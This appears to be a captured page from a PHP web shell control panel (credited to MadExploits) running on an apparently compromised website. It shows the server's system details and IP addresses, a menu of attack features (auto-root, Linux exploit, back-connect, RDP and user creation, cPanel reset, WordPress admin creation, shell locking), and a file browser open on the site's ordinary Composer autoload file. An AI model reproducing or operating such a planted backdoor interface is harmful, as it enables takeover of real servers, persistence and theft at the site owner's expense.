Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.21
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
cbdpackaginghub.com /
vendor /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
ClassLoader.php
15.69
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
autoload_classmap.php
222
B
-rw-r--r--
autoload_files.php
220
B
-rw-r--r--
autoload_namespaces.php
139
B
-rw-r--r--
autoload_psr4.php
314
B
-rw-r--r--
autoload_real.php
1.7
KB
-rw-r--r--
autoload_static.php
1.52
KB
-rw-r--r--
platform_check.php
925
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload_real.php
<?php // autoload_real.php @generated by Composer class ComposerAutoloaderInitdd0195c0d2f163ce34f9322ece397479 { private static $loader; public static function loadClassLoader($class) { if ('Composer\Autoload\ClassLoader' === $class) { require __DIR__ . '/ClassLoader.php'; } } /** * @return \Composer\Autoload\ClassLoader */ public static function getLoader() { if (null !== self::$loader) { return self::$loader; } require __DIR__ . '/platform_check.php'; spl_autoload_register(array('ComposerAutoloaderInitdd0195c0d2f163ce34f9322ece397479', 'loadClassLoader'), true, true); self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__)); spl_autoload_unregister(array('ComposerAutoloaderInitdd0195c0d2f163ce34f9322ece397479', 'loadClassLoader')); require __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInitdd0195c0d2f163ce34f9322ece397479::getInitializer($loader)); $loader->register(true); $includeFiles = \Composer\Autoload\ComposerStaticInitdd0195c0d2f163ce34f9322ece397479::$files; foreach ($includeFiles as $fileIdentifier => $file) { composerRequiredd0195c0d2f163ce34f9322ece397479($fileIdentifier, $file); } return $loader; } } /** * @param string $fileIdentifier * @param string $file * @return void */ function composerRequiredd0195c0d2f163ce34f9322ece397479($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; require $file; } }
Close